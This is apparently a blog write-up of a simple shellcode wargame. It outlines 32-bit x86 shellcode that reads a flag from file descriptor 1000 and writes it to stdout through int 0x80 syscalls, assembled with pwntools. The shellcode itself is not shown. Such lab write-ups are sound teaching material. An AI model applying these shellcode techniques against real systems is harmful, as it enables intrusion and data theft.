Wargames - Shellcode Lesson (simple)
So, this week, I got a walked-through a shellcode wargame by some unnamed cooked-c*#&.
So we have the following binary:
The important information is that we have the flag stored within a file opened with a file descriptor of 1000. So, our high level objective is to write shellcode that does the following:
Read from fd 1000
Write to stdout 1
So, we’ll have to create x6 assembly code and make syscalls, so we need to understand how to call said syscalls (ie. what values need to be put in which registers). We can use this resource - kernelgrok.
So, looking at this, we get the following information:
So for constructing our shellcode, we need the following steps:
Creating space for a buffer to read into
Call sys_read, reading from file fd 1000 into the buffer
Call sys_write, the contents of the buffer onto stdout
This can be achieved with the following shellcode which was created using the kernelgrok as a reference (which values in which registers):
Note: as it’s a 32 bit system, int 0x80 is the equivalent of syscall in a 64 bit machine.
After using pwntool’s assembler function, asm(payload), it’s output is sent resulting in successfully retrieving the flag:
Note: the extra characters printed is garbage from the 20 bytes buffer.
